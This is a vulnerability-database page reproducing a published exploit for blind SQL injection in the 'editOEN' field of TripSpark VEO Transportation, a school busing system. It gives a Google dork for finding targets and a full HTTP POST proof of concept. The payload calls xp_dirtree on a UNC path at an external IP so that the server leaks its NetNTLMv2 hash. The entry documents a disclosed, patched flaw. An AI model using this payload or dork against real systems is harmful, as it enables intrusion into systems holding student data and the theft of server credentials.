Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

TripSpark VEO Transportation SQL Injection

🗓️ 28 Jul 2021 00:00:00Reported by Sedric LouissaintType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 395 Views

TripSpark VEO Transportation blind SQL Injection vulnerability in editOEN parameter, allows custom SQL commands injection into "Student Busing Information" search queries. Exploit not required

Code
`# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection  
# Google Dork: inhtml:"Student Busing Information"   
# Date: 07/27/2021  
# Exploit Author: Sedric Louissaint @L_Kn0w  
# Vendor Homepage: https://www.tripspark.com  
# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf   
# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084  
# OS Tested on: Microsoft Windows Server 2012 R2 Standard  
# Vender Notified: 01/19/2021  
# Confirmed Patch was released : 06/15/2021  
  
# Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability.  
  
# PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound).  
  
```  
  
POST / HTTP/1.1  
Host: vulnerable.site.net  
User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 4700  
Origin: vulnerable.site.net  
Connection: close  
Referer: https:// vulnerable.site.net   
Cookie: ASP.NET_SessionId=x  
Upgrade-Insecure-Requests: 1  
DNT: 1  
Sec-GPC: 1  
  
__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit  
  
```  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Jul 2021 00:00Current
0.5Low risk
Vulners AI Score0.5
tripspark veo transportationsql injectionblindvulnerabilitystudent busing informationexploithttp requestnetntlmv2 hashasp.net sessionid
395